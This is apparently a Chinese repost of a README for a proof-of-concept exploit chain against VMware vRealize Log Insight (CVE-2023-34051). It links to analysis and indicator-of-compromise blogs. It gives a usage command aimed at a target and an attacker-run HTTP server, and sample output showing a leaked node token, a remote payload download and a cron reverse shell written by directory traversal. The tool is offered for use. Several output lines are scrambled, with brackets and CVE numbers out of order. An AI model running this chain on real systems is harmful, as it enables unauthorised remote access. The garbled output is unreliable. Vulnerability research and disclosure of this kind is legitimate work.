CVE-2023-34051 是一种绕过 VMSA-2023-0001 补丁的身份验证绕过方法。适用于 vRealize Log Insight 的 VMSA-2023-0001 包括以下 CVE:
-
VMware vRealize Log Insight 目录遍历漏洞 (CVE-2022-31706)
-
VMware vRealize Log Insight 破坏访问控制漏洞 (CVE-2022-31704)
-
VMware vRealize Log Insight 包含信息泄露漏洞 (CVE-2022-31711)
该漏洞的默认配置会编写一个 cron 作业来创建反向 shell。请务必更改该payload文件以适合您的环境。
技术分析
您可以在我们的博客上找到该漏洞的技术根本原因分析:https ://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive
妥协指标
要分析 Log Insight 实例以查找妥协指标,请查看我们的 IOC 博客:https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
概括
该POC滥用IP地址欺骗和各种Thrift RPC端点来实现任意文件写入。
用法
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[-2022-31711 to leak node token ] Using CVE
[-71fa-45fd-a0a0-6114a55a8fb8 ] Found node token: f261d2f5
[-2022-31704 to trigger malicious file download ] Using CVE
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[ ] File successfully downloaded
[-2022-31706 to trigger directory traversal and write cron reverse shell ] Using CVE
[ ] Payload successfully delivered
项目地址:
https://github.com/horizon3ai/CVE-2023-34051
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):VMware Aria 日志操作 CVE-2023-34051身份验证绕过
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论